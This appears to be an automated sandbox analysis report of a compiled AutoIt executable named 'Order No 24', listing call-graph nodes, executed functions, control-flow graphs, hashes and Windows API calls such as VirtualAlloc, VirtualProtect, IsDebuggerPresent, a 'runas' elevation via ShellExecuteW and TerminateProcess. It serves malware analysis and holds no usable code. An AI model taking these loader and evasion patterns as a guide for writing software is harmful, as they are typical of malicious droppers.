95766->95776 95778 1274e60 GetPEB 95766->95778 95768 1274020 CreateFileW 95768->95766 95768->95771 95770 127406a ReadFile 95769->95770 95769->95771 95770->95771 95774 1274088 VirtualAlloc 95770->95774 95772 127423c VirtualFree 95771->95772 95773 127424a 95771->95773 95772->95773 95773->95763 95774->95766 95774->95771 95775->95766 95776->95766 95777->95763 95779 1274e8a 95778->95779 95779->95768 95780 9f9bec 95816 990ae0 _memcpy_s Mailbox 95780->95816 95782 99f4ea 48 API calls 95782->95816 95783 991526 Mailbox 95872 9ccc5c 86 API calls 4 library calls 95783->95872 95786 990509 95875 9ccc5c 86 API calls 4 library calls 95786->95875 95787 99146e 95796 986eed 48 API calls 95787->95796 95791 991473 95874 9ccc5c 86 API calls 4 library calls 95791->95874 95792 99f4ea 48 API calls 95813 98fec8 95792->95813 95794 9fa922 95795 9fa246 95798 986eed 48 API calls 95795->95798 95811 98ffe1 Mailbox 95796->95811 95797 986eed 48 API calls 95797->95813 95798->95811 95801 9b97ed InterlockedDecrement 95801->95813 95802 9fa873 95803 98d7f7 48 API calls 95803->95813 95804 9fa30e 95804->95811 95870 9b97ed InterlockedDecrement 95804->95870 95805 98ce19 48 API calls 95805->95816 95807 9fa973 95876 9ccc5c 86 API calls 4 library calls 95807->95876 95808 9a0f0a 52 API calls __cinit 95808->95813 95810 9fa982 95812 9915b5 95873 9ccc5c 86 API calls 4 library calls 95812->95873 95813->95786 95813->95787 95813->95791 95813->95792 95813->95795 95813->95797 95813->95801 95813->95803 95813->95804 95813->95807 95813->95808 95813->95811 95813->95812 95867 991820 331 API calls 2 library calls 95813->95867 95868 991d10 59 API calls Mailbox 95813->95868 95814 9de822 331 API calls 95814->95816 95815 98fe30 331 API calls 95815->95816 95816->95782 95816->95783 95816->95805 95816->95811 95816->95813 95816->95814 95816->95815 95817 9fa706 95816->95817 95819 9b97ed InterlockedDecrement 95816->95819 95822 9d6ff0 331 API calls 95816->95822 95823 9e0d09 95816->95823 95826 9e0d1d 95816->95826 95829 9df0ac 95816->95829 95861 9ca6ef 95816->95861 95869 9def61 82 API calls 2 library calls 95816->95869 95871 9ccc5c 86 API calls 4 library calls 95817->95871 95819->95816 95822->95816 95877 9df8ae 95823->95877 95825 9e0d19 95825->95816 95827 9df8ae 129 API calls 95826->95827 95828 9e0d2d 95827->95828 95828->95816 95830 98d7f7 48 API calls 95829->95830 95831 9df0c0 95830->95831 95832 98d7f7 48 API calls 95831->95832 95833 9df0c8 95832->95833 95834 98d7f7 48 API calls 95833->95834 95835 9df0d0 95834->95835 95836 98936c 81 API calls 95835->95836 95846 9df0de 95836->95846 95837 9df2f9 Mailbox 95837->95816 95838 986a63 48 API calls 95838->95846 95839 9df2b3 95844 98518c 48 API calls 95839->95844 95841 98c799 48 API calls 95841->95846 95842 9df2ce 95845 98518c 48 API calls 95842->95845 95843 986eed 48 API calls 95843->95846 95847 9df2c0 95844->95847 95848 9df2dd 95845->95848 95846->95837 95846->95838 95846->95839 95846->95841 95846->95842 95846->95843 95849 98bdfa 48 API calls 95846->95849 95852 98bdfa 48 API calls 95846->95852 95854 9df2cc 95846->95854 95858 98936c 81 API calls 95846->95858 95859 98510d 48 API calls 95846->95859 95860 98518c 48 API calls 95846->95860 95850 98510d 48 API calls 95847->95850 95851 98510d 48 API calls 95848->95851 95853 9df175 CharUpperBuffW 95849->95853 95850->95854 95851->95854 95855 9df23a CharUpperBuffW 95852->95855 95856 98d645 53 API calls 95853->95856 95854->95837 95964 986b68 48 API calls 95854->95964 95963 99d922 55 API calls 2 library calls 95855->95963 95856->95846 95858->95846 95859->95846 95860->95846 95862 9ca6fb 95861->95862 95863 99f4ea 48 API calls 95862->95863 95864 9ca709 95863->95864 95865 9ca717 95864->95865 95866 98d7f7 48 API calls 95864->95866 95865->95816 95866->95865 95867->95813 95868->95813 95869->95816 95870->95811 95871->95783 95872->95811 95873->95811 95874->95802 95875->95794 95876->95810 95878 98936c 81 API calls 95877->95878 95879 9df8ea 95878->95879 95884 9df92c Mailbox 95879->95884 95913 9e0567 95879->95913 95881 9dfb8b 95882 9dfcfa 95881->95882 95888 9dfb95 95881->95888 95949 9e0688 89 API calls Mailbox 95882->95949 95884->95825 95886 9dfd07 95886->95888 95889 9dfd13 95886->95889 95887 9df984 Mailbox 95887->95881 95887->95884 95890 98936c 81 API calls 95887->95890 95944 9e29e8 48 API calls _memcpy_s 95887->95944 95945 9dfda5 60 API calls 2 library calls 95887->95945 95926 9df70a 95888->95926 95889->95884 95890->95887 95895 9dfbc9 95940 99ed18 95895->95940 95898 9dfbfd 95901 99c050 48 API calls 95898->95901 95899 9dfbe3 95946 9ccc5c 86 API calls 4 library calls 95899->95946 95903 9dfc14 95901->95903 95902 9dfbee GetCurrentProcess TerminateProcess 95902->95898 95905 991b90 48 API calls 95903->95905 95912 9dfc3e 95903->95912 95904 9dfd65 95904->95884 95909 9dfd7e FreeLibrary 95904->95909 95906 9dfc2d 95905->95906 95947 9e040f 105 API calls _free 95906->95947 95907 991b90 48 API calls 95907->95912 95909->95884 95912->95904 95912->95907 95948 98dcae 50 API calls Mailbox 95912->95948 95950 9e040f 105 API calls _free 95912->95950 95914 98bdfa 48 API calls 95913->95914 95915 9e0582 CharLowerBuffW 95914->95915 95951 9c1f11 95915->95951 95919 98d7f7 48 API calls 95920 9e05bb 95919->95920 95958 9869e9 48 API calls _memcpy_s 95920->95958 95922 9e05d2 95923 98b18b 48 API calls 95922->95923 95924 9e05de Mailbox 95923->95924 95925 9e061a Mailbox 95924->95925 95959 9dfda5 60 API calls 2 library calls 95924->95959 95925->95887 95927 9df725 95926->95927 95931 9df77a 95926->95931 95928 99f4ea 48 API calls 95927->95928 95930 9df747 95928->95930 95929 99f4ea 48 API calls 95929->95930 95930->95929 95930->95931 95932 9e0828 95931->95932 95933 9e0a53 Mailbox 95932->95933 95939 9e084b _strcat _wcscpy __NMSG_WRITE 95932->95939 95933->95895 95934 98d286 48 API calls 95934->95939 95935 98cf93 58 API calls 95935->95939 95936 98936c 81 API calls 95936->95939 95937 9a395c 47 API calls std::exception::_Copy_str 95937->95939 95939->95933 95939->95934 95939->95935 95939->95936 95939->95937 95962 9c8035 50 API calls __NMSG_WRITE 95939->95962 95941 99ed2d 95940->95941 95942 99edc5 VirtualProtect 95941->95942 95943 99ed93 95941->95943 95942->95943 95943->95898 95943->95899 95944->95887 95945->95887 95946->95902 95947->95912 95948->95912 95949->95886 95950->95912 95952 9c1f3b __NMSG_WRITE 95951->95952 95953 9c1f79 95952->95953 95955 9c1f6f 95952->95955 95957 9c1ffa 95952->95957 95953->95919 95953->95924 95955->95953 95960 99d37a 60 API calls 95955->95960 95957->95953 95961 99d37a 60 API calls 95957->95961 95958->95922 95959->95925 95960->95955 95961->95957 95962->95939 95963->95846 95964->95837 95965 9f19cb 95970 982322 95965->95970 95967 9f19d1 96003 9a0f0a 52 API calls __cinit 95967->96003 95969 9f19db 95971 982344 95970->95971 96004 9826df 95971->96004 95976 98d7f7 48 API calls 95977 982384 95976->95977 95978 98d7f7 48 API calls 95977->95978 95979 98238e 95978->95979 95980 98d7f7 48 API calls 95979->95980 95981 982398 95980->95981 95982 98d7f7 48 API calls 95981->95982 95983 9823de 95982->95983 95984 98d7f7 48 API calls 95983->95984 95985 9824c1 95984->95985 96012 98263f 95985->96012 95989 9824f1 95990 98d7f7 48 API calls 95989->95990 95991 9824fb 95990->95991 96041 982745 95991->96041 95993 982546 95994 982556 GetStdHandle 95993->95994 95995 9f501d 95994->95995 95996 9825b1 95994->95996 95995->95996 95998 9f5026 95995->95998 95997 9825b7 CoInitialize 95996->95997 95997->95967 96048 9c92d4 53 API calls 95998->96048 96000 9f502d 96049 9c99f9 CreateThread 96000->96049 96002 9f5039 CloseHandle 96002->95997 96003->95969 96050 982854 96004->96050 96007 986a63 48 API calls 96008 98234a 96007->96008 96009 98272e 96008->96009 96064 9827ec 6 API calls 96009->96064 96011 98237a 96011->95976 96013 98d7f7 48 API calls 96012->96013 96014 98264f 96013->96014 96015 98d7f7 48 API calls 96014->96015 96016 982657 96015->96016 96065 9826a7 96016->96065 96019 9826a7 48 API calls 96020 982667 96019->96020 96021 98d7f7 48 API calls 96020->96021 96022 982672 96021->96022 96023 99f4ea 48 API calls 96022->96023 96024 9824cb 96023->96024 96025 9822a4 96024->96025 96026 9822b2 96025->96026 96027 98d7f7 48 API calls 96026->96027 96028 9822bd 96027->96028 96029 98d7f7 48 API calls 96028->96029 96030 9822c8 96029->96030 96031 98d7f7 48 API calls 96030->96031 96032 9822d3 96031->96032 96033 98d7f7 48 API calls 96032->96033 96034 9822de 96033->96034 96035 9826a7 48 API calls 96034->96035 96036 9822e9 96035->96036 96037 99f4ea 48 API calls 96036->96037 96038 9822f0 96037->96038 96039 9822f9 RegisterWindowMessageW 96038->96039 96040 9f1fe7 96038->96040 96039->95989 96042 9f5f4d 96041->96042 96043 982755 96041->96043 96070 9cc942 50 API calls 96042->96070 96045 99f4ea 48 API calls 96043->96045 96047 98275d 96045->96047 96046 9f5f58 96047->95993 96048->96000 96049->96002 96071 9c99df 54 API calls 96049->96071 96057 982870 96050->96057 96053 982870 48 API calls 96054 982864 96053->96054 96055 98d7f7 48 API calls 96054->96055 96056 982716 96055->96056 96056->96007 96058 98d7f7 48 API calls 96057->96058 96059 98287b 96058->96059 96060 98d7f7 48 API calls 96059->96060 96061 982883 96060->96061 96062 98d7f7 48 API calls 96061->96062 96063 98285c 96062->96063 96063->96053 96064->96011 96066 98d7f7 48 API calls 96065->96066 96067 9826b0 96066->96067 96068 98d7f7 48 API calls 96067->96068 96069 98265f 96068->96069 96069->96019 96070->96046 96072 98ef80 96075 993b70 96072->96075 96074 98ef8c 96076 993bc8 96075->96076 96129 9942a5 96075->96129 96077 993bef 96076->96077 96079 9f6fd1 96076->96079 96081 9f6f7e 96076->96081 96088 9f6f9b 96076->96088 96078 99f4ea 48 API calls 96077->96078 96080 993c18 96078->96080 96155 9dceca 331 API calls Mailbox 96079->96155 96083 99f4ea 48 API calls 96080->96083 96081->96077 96084 9f6f87 96081->96084 96136 993c2c _memcpy_s __NMSG_WRITE 96083->96136 96152 9dd552 331 API calls Mailbox 96084->96152 96085 9f6fbe 96154 9ccc5c 86 API calls 4 library calls 96085->96154 96088->96085 96153 9dda0e 331 API calls 2 library calls 96088->96153 96089 9942f2 96174 9ccc5c 86 API calls 4 library calls 96089->96174 96092 9f73b0 96092->96074 96093 9f7297 96163 9ccc5c 86 API calls 4 library calls 96093->96163 96094 9f737a 96173 9ccc5c 86 API calls 4 library calls 96094->96173 96095 99dce0 53 API calls 96095->96136 96099 9940df 96164 9ccc5c 86 API calls 4 library calls 96099->96164 96101 9f707e 96156 9ccc5c 86 API calls 4 library calls 96101->96156 96103 98d6e9 55 API calls 96103->96136 96107 98d645 53 API calls 96107->96136 96109 9f72d2 96165 9ccc5c 86 API calls 4 library calls 96109->96165 96111 9f7350 96171 9ccc5c 86 API calls 4 library calls 96111->96171 96113 98fe30 331 API calls 96113->96136 96114 9f7363 96172 9ccc5c 86 API calls 4 library calls 96114->96172 96116 9f72e9 96166 9ccc5c 86 API calls 4 library calls 96116->96166 96119 986a63 48 API calls 96119->96136 96121 98d286 48 API calls 96121->96136 96122 99c050 48 API calls 96122->96136 96123 9f714c 96160 9dccdc 48 API calls 96123->96160 96125 993f2b 96125->96074 96126 9f733f 96170 9ccc5c 86 API calls 4 library calls 96126->96170 96167 9ccc5c 86 API calls 4 library calls 96129->96167 96130 9f71a1 96162 99c15c 48 API calls 96130->96162 96133 99ee75 48 API calls 96133->96136 96134 986eed 48 API calls 96134->96136 96136->96089 96136->96093 96136->96094 96136->96095 96136->96099 96136->96101 96136->96103 96136->96107 96136->96109 96136->96111 96136->96113 96136->96114 96136->96116 96136->96119 96136->96121 96136->96122 96136->96123 96136->96125 96136->96126 96136->96129 96136->96133 96136->96134 96140 9f71e1 96136->96140 96144 99f4ea 48 API calls 96136->96144 96147 98d9a0 53 API calls __cinit 96136->96147 96148 98d83d 53 API calls 96136->96148 96149 98cdb9 48 API calls 96136->96149 96150 99c15c 48 API calls 96136->96150 96151 99becb 331 API calls 96136->96151 96157 98dcae 50 API calls Mailbox 96136->96157 96158 9dccdc 48 API calls 96136->96158 96159 9ca1eb 50 API calls 96136->96159 96137 9f715f 96137->96130 96161 9dccdc 48 API calls 96137->96161 96139 9f71ce 96141 99c050 48 API calls 96139->96141 96140->96125 96169 9ccc5c 86 API calls 4 library calls 96140->96169 96143 9f71d6 96141->96143 96142 9f71ab 96142->96129 96142->96139 96143->96140 96145 9f7313 96143->96145 96144->96136 96168 9ccc5c 86 API calls 4 library calls 96145->96168 96147->96136 96148->96136 96149->96136 96150->96136 96151->96136 96152->96125 96153->96085 96154->96079 96155->96136 96156->96125 96157->96136 96158->96136 96159->96136 96160->96137 96161->96137 96162->96142 96163->96099 96164->96125 96165->96116 96166->96125 96167->96125 96168->96125 96169->96125 96170->96125 96171->96125 96172->96125 96173->96125 96174->96092 96175 9cbb64 96176 9cbb77 96175->96176 96177 9cbb71 96175->96177 96179 9a1c9d _free 47 API calls 96176->96179 96180 9cbb88 96176->96180 96178 9a1c9d _free 47 API calls 96177->96178 96178->96176 96179->96180 96181 9a1c9d _free 47 API calls 96180->96181 96182 9cbb9a 96180->96182 96181->96182 96183 9f9c06 96194 99d3be 96183->96194 96185 9f9c1c 96186 9f9c91 Mailbox 96185->96186 96203 981caa 49 API calls 96185->96203 96188 993200 331 API calls 96186->96188 96191 9f9cc5 96188->96191 96190 9f9c71 96190->96191 96204 9cb171 48 API calls 96190->96204 96193 9fa7ab Mailbox 96191->96193 96205 9ccc5c 86 API calls 4 library calls 96191->96205 96195 99d3ca 96194->96195 96196 99d3dc 96194->96196 96206 98dcae 50 API calls Mailbox 96195->96206 96198 99d40b 96196->96198 96199 99d3e2 96196->96199 96207 98dcae 50 API calls Mailbox 96198->96207 96201 99f4ea 48 API calls 96199->96201 96202 99d3d4 96201->96202 96202->96185 96203->96190 96204->96186 96205->96193 96206->96202 96207->96202 96208 983742 96209 98374b 96208->96209 96210 9837c8 96209->96210 96211 983769 96209->96211 96249 9837c6 96209->96249 96213 9837ce 96210->96213 96214 9f1e00 96210->96214 96215 98382c PostQuitMessage 96211->96215 96216 983776 96211->96216 96212 9837ab DefWindowProcW 96237 9837b9 96212->96237 96217 9837d3 96213->96217 96218 9837f6 SetTimer RegisterWindowMessageW 96213->96218 96263 982ff6 16 API calls 96214->96263 96215->96237 96220 9f1e88 96216->96220 96221 983781 96216->96221 96222 9837da KillTimer 96217->96222 96223 9f1da3 96217->96223 96225 98381f CreatePopupMenu 96218->96225 96218->96237 96268 9c4ddd 60 API calls _memset 96220->96268 96226 983789 96221->96226 96227 983836 96221->96227 96260 983847 Shell_NotifyIconW _memset 96222->96260 96230 9f1ddc MoveWindow 96223->96230 96231 9f1da8 96223->96231 96224 9f1e27 96264 99e312 331 API calls Mailbox 96224->96264 96225->96237 96234 9f1e6d 96226->96234 96235 983794 96226->96235 96253 99eb83 96227->96253 96230->96237 96238 9f1dac 96231->96238 96239 9f1dcb SetFocus 96231->96239 96234->96212 96267 9ba5f3 48 API calls 96234->96267 96241 98379f 96235->96241 96242 9f1e58 96235->96242 96236 9f1e9a 96236->96212 96236->96237 96238->96241 96243 9f1db5 96238->96243 96239->96237 96240 9837ed 96261 98390f DeleteObject DestroyWindow Mailbox 96240->96261 96241->96212 96265 983847 Shell_NotifyIconW _memset 96241->96265 96266 9c55bd 70 API calls _memset 96242->96266 96262 982ff6 16 API calls 96243->96262 96248 9f1e68 96248->96237 96249->96212 96251 9f1e4c 96252 984ffc 67 API calls 96251->96252 96252->96249 96254 99eb9a _memset 96253->96254 96255 99ec1c 96253->96255 96256 9851af 50 API calls 96254->96256 96255->96237 96258 99ebc1 96256->96258 96257 99ec05 KillTimer SetTimer 96257->96255 96258->96257 96259 9f3c7a Shell_NotifyIconW 96258->96259 96259->96257 96260->96240 96261->96237 96262->96237 96263->96224 96264->96241 96265->96251 96266->96248 96267->96249 96268->96236

                                                                                                                                  Executed Functions

                                                                                                                                  Function 009AB043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 744 9ab043-9ab080 call 9af8a0 747 9ab089-9ab08b 744->747 748 9ab082-9ab084 744->748 750 9ab0ac-9ab0d9 747->750 751 9ab08d-9ab0a7 call 9a7bda call 9a7c0e call 9a6e10 747->751 749 9ab860-9ab86c call 9aa70c 748->749 754 9ab0db-9ab0de 750->754 755 9ab0e0-9ab0e7 750->755 751->749 754->755 758 9ab10b-9ab110 754->758 759 9ab0e9-9ab100 call 9a7bda call 9a7c0e call 9a6e10 755->759 760 9ab105 755->760 762 9ab11f-9ab12d call 9b3bf2 758->762 763 9ab112-9ab11c call 9af82f 758->763 790 9ab851-9ab854 759->790 760->758 775 9ab44b-9ab45d 762->775 776 9ab133-9ab145 762->776 763->762 777 9ab7b8-9ab7d5 WriteFile 775->777 778 9ab463-9ab473 775->778 776->775 780 9ab14b-9ab183 call 9a7a0d GetConsoleMode 776->780 784 9ab7e1-9ab7e7 GetLastError 777->784 785 9ab7d7-9ab7df 777->785 781 9ab55a-9ab55f 778->781 782 9ab479-9ab484 778->782 780->775 794 9ab189-9ab18f 780->794 792 9ab663-9ab66e 781->792 793 9ab565-9ab56e 781->793 788 9ab48a-9ab49a 782->788 789 9ab81b-9ab833 782->789 791 9ab7e9 784->791 785->791 795 9ab4a0-9ab4a3 788->795 796 9ab83e-9ab84e call 9a7c0e call 9a7bda 789->796 797 9ab835-9ab838 789->797 801 9ab85e-9ab85f 790->801 799 9ab7ef-9ab7f1 791->799 792->789 798 9ab674 792->798 793->789 800 9ab574 793->800 802 9ab199-9ab1bc GetConsoleCP 794->802 803 9ab191-9ab193 794->803 804 9ab4e9-9ab520 WriteFile 795->804 805 9ab4a5-9ab4be 795->805 796->790 797->796 806 9ab83a-9ab83c 797->806 807 9ab67e-9ab693 798->807 809 9ab7f3-9ab7f5 799->809 810 9ab856-9ab85c 799->810 811 9ab57e-9ab595 800->811 801->749 812 9ab1c2-9ab1ca 802->812 813 9ab440-9ab446 802->813 803->775 803->802 804->784 816 9ab526-9ab538 804->816 814 9ab4cb-9ab4e7 805->814 815 9ab4c0-9ab4ca 805->815 806->801 817 9ab699-9ab69b 807->817 809->789 819 9ab7f7-9ab7fc 809->819 810->801 820 9ab59b-9ab59e 811->820 823 9ab1d4-9ab1d6 812->823 813->809 814->795 814->804 815->814 816->799 824 9ab53e-9ab54f 816->824 825 9ab6d8-9ab719 WideCharToMultiByte 817->825 826 9ab69d-9ab6b3 817->826 828 9ab7fe-9ab810 call 9a7c0e call 9a7bda 819->828 829 9ab812-9ab819 call 9a7bed 819->829 821 9ab5de-9ab627 WriteFile 820->821 822 9ab5a0-9ab5b6 820->822 821->784 832 9ab62d-9ab645 821->832 830 9ab5b8-9ab5ca 822->830 831 9ab5cd-9ab5dc 822->831 834 9ab36b-9ab36e 823->834 835 9ab1dc-9ab1fe 823->835 824->788 836 9ab555 824->836 825->784 840 9ab71f-9ab721 825->840 837 9ab6c7-9ab6d6 826->837 838 9ab6b5-9ab6c4 826->838 828->790 829->790 830->831 831->820 831->821 832->799 844 9ab64b-9ab658 832->844 848 9ab370-9ab373 834->848 849 9ab375-9ab3a2 834->849 846 9ab200-9ab215 835->846 847 9ab217-9ab223 call 9a1688 835->847 836->799 837->817 837->825 838->837 842 9ab727-9ab75a WriteFile 840->842 850 9ab77a-9ab78e GetLastError 842->850 851 9ab75c-9ab776 842->851 844->811 853 9ab65e 844->853 854 9ab271-9ab283 call 9b40f7 846->854 868 9ab269-9ab26b 847->868 869 9ab225-9ab239 847->869 848->849 856 9ab3a8-9ab3ab 848->856 849->856 862 9ab794-9ab796 850->862 851->842 859 9ab778 851->859 853->799 871 9ab289 854->871 872 9ab435-9ab43b 854->872 857 9ab3ad-9ab3b0 856->857 858 9ab3b2-9ab3c5 call 9b5884 856->858 857->858 864 9ab407-9ab40a 857->864 858->784 877 9ab3cb-9ab3d5 858->877 859->862 862->791 867 9ab798-9ab7b0 862->867 864->823 874 9ab410 864->874 867->807 873 9ab7b6 867->873 868->854 875 9ab23f-9ab254 call 9b40f7 869->875 876 9ab412-9ab42d 869->876 878 9ab28f-9ab2c4 WideCharToMultiByte 871->878 872->791 873->799 874->872 875->872 886 9ab25a-9ab267 875->886 876->872 880 9ab3fb-9ab401 877->880 881 9ab3d7-9ab3ee call 9b5884 877->881 878->872 882 9ab2ca-9ab2f0 WriteFile 878->882 880->864 881->784 889 9ab3f4-9ab3f5 881->889 882->784 885 9ab2f6-9ab30e 882->885 885->872 888 9ab314-9ab31b 885->888 886->878 888->880 890 9ab321-9ab34c WriteFile 888->890 889->880 890->784 891 9ab352-9ab359 890->891 891->872 892 9ab35f-9ab366 891->892 892->880
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 57a51958d74929b9b993abf0328b1fcdc932b73c23905ac9a39d3d6c719ccb96
                                                                                                                                  • Instruction ID: 3ca2b0ba836b11f5787cb1279356e3110861f6ada2f8aa8387a57d12d48fe2e3
                                                                                                                                  • Opcode Fuzzy Hash: 57a51958d74929b9b993abf0328b1fcdc932b73c23905ac9a39d3d6c719ccb96
                                                                                                                                  • Instruction Fuzzy Hash: D0324F75B022288BDB24CF58DC416E9B7B9FB4B314F1841D9E40AA7A52D7349E81CF92
                                                                                                                                  Function 00983D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00983AA3,?), ref: 00983D45
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,00983AA3,?), ref: 00983D57
                                                                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00A41148,00A41130,?,?,?,?,00983AA3,?), ref: 00983DC8
                                                                                                                                    • Part of subcall function 00986430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00983DEE,00A41148,?,?,?,?,?,00983AA3,?), ref: 00986471
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00983AA3,?), ref: 00983E48
                                                                                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00A328F4,00000010), ref: 009F1CCE
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00A41148,?,?,?,?,?,00983AA3,?), ref: 009F1D06
                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A1DAB4,00A41148,?,?,?,?,?,00983AA3,?), ref: 009F1D89
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,?,?,?,?,00983AA3), ref: 009F1D90
                                                                                                                                    • Part of subcall function 00983E6E: GetSysColorBrush.USER32(0000000F), ref: 00983E79
                                                                                                                                    • Part of subcall function 00983E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00983E88
                                                                                                                                    • Part of subcall function 00983E6E: LoadIconW.USER32(00000063), ref: 00983E9E
                                                                                                                                    • Part of subcall function 00983E6E: LoadIconW.USER32(000000A4), ref: 00983EB0
                                                                                                                                    • Part of subcall function 00983E6E: LoadIconW.USER32(000000A2), ref: 00983EC2
                                                                                                                                    • Part of subcall function 00983E6E: RegisterClassExW.USER32(?), ref: 00983F30
                                                                                                                                    • Part of subcall function 009836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009836E6
                                                                                                                                    • Part of subcall function 009836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983707
                                                                                                                                    • Part of subcall function 009836B8: ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 0098371B
                                                                                                                                    • Part of subcall function 009836B8: ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 00983724
                                                                                                                                    • Part of subcall function 00984FFC: _memset.LIBCMT ref: 00985022
                                                                                                                                    • Part of subcall function 00984FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009850CB
                                                                                                                                  Strings
                                                                                                                                  • runas, xrefs: 009F1D84
                                                                                                                                  • This is a third-party compiled AutoIt script., xrefs: 009F1CC8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                  • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                                  • API String ID: 438480954-3287110873
                                                                                                                                  • Opcode ID: 59c1751129640a6f34b5d1309366f4890e870957ea80643a4186e665de0acd14
                                                                                                                                  • Instruction ID: 096e58533d10d55ff2e4b97846c00ab6f250efa26f91c305b043d01be4ddb281
                                                                                                                                  • Opcode Fuzzy Hash: 59c1751129640a6f34b5d1309366f4890e870957ea80643a4186e665de0acd14
                                                                                                                                  • Instruction Fuzzy Hash: FC510539A44248BBCB11FBF8DC45FED7B79AFC6B00F008169F21166292DB754686CB21
                                                                                                                                  Function 0099DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1141 99ddc0-99de4f call 98d7f7 GetVersionExW call 986a63 call 99dfb4 call 986571 1150 9f24c8-9f24cb 1141->1150 1151 99de55-99de56 1141->1151 1154 9f24cd 1150->1154 1155 9f24e4-9f24e8 1150->1155 1152 99de58-99de63 1151->1152 1153 99de92-99dea2 call 99df77 1151->1153 1159 99de69-99de6b 1152->1159 1160 9f244e-9f2454 1152->1160 1172 99dea4-99dec1 GetCurrentProcess call 99df5f 1153->1172 1173 99dec7-99dee1 1153->1173 1156 9f24d0 1154->1156 1157 9f24ea-9f24f3 1155->1157 1158 9f24d3-9f24dc 1155->1158 1156->1158 1157->1156 1164 9f24f5-9f24f8 1157->1164 1158->1155 1165 9f2469-9f2475 1159->1165 1166 99de71-99de74 1159->1166 1162 9f245e-9f2464 1160->1162 1163 9f2456-9f2459 1160->1163 1162->1153 1163->1153 1164->1158 1168 9f247f-9f2485 1165->1168 1169 9f2477-9f247a 1165->1169 1170 99de7a-99de89 1166->1170 1171 9f2495-9f2498 1166->1171 1168->1153 1169->1153 1177 9f248a-9f2490 1170->1177 1178 99de8f 1170->1178 1171->1153 1179 9f249e-9f24b3 1171->1179 1172->1173 1192 99dec3 1172->1192 1175 99df31-99df3b GetSystemInfo 1173->1175 1176 99dee3-99def7 call 99e00c 1173->1176 1181 99df0e-99df1a 1175->1181 1189 99df29-99df2f GetSystemInfo 1176->1189 1190 99def9-99df01 call 99dff4 GetNativeSystemInfo 1176->1190 1177->1153 1178->1153 1183 9f24bd-9f24c3 1179->1183 1184 9f24b5-9f24b8 1179->1184 1186 99df1c-99df1f FreeLibrary 1181->1186 1187 99df21-99df26 1181->1187 1183->1153 1184->1153 1186->1187 1191 99df03-99df07 1189->1191 1190->1191 1191->1181 1195 99df09-99df0c FreeLibrary 1191->1195 1192->1173 1195->1181
                                                                                                                                  APIs
                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 0099DDEC
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00A1DC38,?,?), ref: 0099DEAC
                                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?,00A1DC38,?,?), ref: 0099DF01
